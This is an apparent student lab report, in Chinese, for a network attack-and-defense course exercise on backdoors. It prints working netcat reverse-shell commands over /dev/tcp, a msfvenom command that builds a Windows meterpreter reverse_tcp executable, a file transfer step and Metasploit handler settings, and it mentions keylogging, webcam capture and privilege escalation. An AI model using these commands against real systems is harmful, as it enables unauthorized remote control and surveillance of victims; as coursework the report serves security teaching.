2018-2019-2 《网络对抗技术》Exp2 后门原理与实践 Week4 201652
Exp2 后门原理与实践实验内容一、基础问题回答1.例举你能想到的一个后门进入到你系统中的可能方式?答:通过访问钓鱼网站,无意下载了一些图片或是文件。而这个图片或文件中携带后门。 2.例举你知道的后门如何启动起来(win及linux)的方式?答:对于Windows来说:
对于linux来说:
3.Meterpreter有哪些给你印象深刻的功能?答:生成一个后门的可执行文件,并将其植入被控主机;可以对被控主机进行屏幕截图、击键记录、录音以及提权等操作。 4.如何发现自己的系统有没有被安装后门?答:(1)安装杀毒软件,可以进行实时监控; 二、实验步骤实验点一:使用netcat获取主机操作Shell,cron启动Mac获得Linux Shell
nc -l 5233
bash -i >& /dev/tcp/172.16.31.1/5233 0>&1
Linux获得Mac Shell
nc -l -p 5233
bash -i >& /dev/tcp/172.16.31.134/5233 0>&1
cron启动
实验点二:使用socat获取主机操作Shell,任务计划启动
实验点三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.31.134 LPORT=5233 -f exe > 20165233_backdoor.exe
ncat.exe -l 5233 > 20165233_backdoor.exe 或者 ncat.exe -lv 5318 > 20165318_backdoor.exe 通过
nc 10.211.55.3 5233 < 20165233_backdoor.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.31.134 set LPORT 5233
实验点四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
实验中遇到的问题就是上一步遇到的问题...无法进行提权。 实验收获与感想这次实验还蛮有意思的,就是在互相进行监听时,对于反弹后门所使用的IP地址有些混乱,必须冷静的推一下...在MSF meterpreter那里,通过各种命令对被控主机进行一系列的监听,"偷窥"之类的操作,不禁让人心里打了寒颤,黑客可以很轻易的获取到全世界各地的摄像头...所以也很早以前就把Mac的摄像头贴起来了。 通过这次实验,也透彻的了解了后门的原理,但是实际黑客的后门是更加隐蔽和难以发现的。对于后门的发现与检测也获得了一定的方法,比起以前只知道杀毒软件和防火墙要高级许多。 (编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |
- 调试工具DEBUG的使用(8086)
- windows-server-2008 – 删除了不会联机的群集磁盘,现在它想
- 电子邮件 – 管理内部部署Exchange Server所需的最低年度开
- 右键单击Windows 10中带有AutoHotKey的托盘图标
- Windows上的Hudson错误:java.io.IOException:无法运行程序
- windows-server-2008-r2 – 没有源IP的事件ID 4625
- 为什么WPF应用程序在Windows 7和Windows 8之间看起来不一样
- .net – 在同一个解决方案中为多个项目添加相同的“* .dll”
- 在Mail(32位)中设置Office 365 / Exchange 365电子邮件而不
- Windows Phone 7 – WP7上的宽瓦通知?
- windows – 如何在node.js上杀死一个打开的进程?
- 记 Win10 - Archlinux - Archlinux(Emergency) 三
- 是否可以在Windows和Linux之间共享PostgreSQL数据
- windows-7 – 更改Windows(7)的方法通过脚本监视
- windows – 查找原始入口点
- windows-server-2008 – 强化Windows Server 200
- windows – 我无法将网络驱动器映射到sharepoint
- win2003 vps IIS6中添加站点并绑定域名的配置方法
- CreateThread()在64位Windows上失败,在32位Windo
- windows-phone-7 – WP 8:如何从Visual Studio部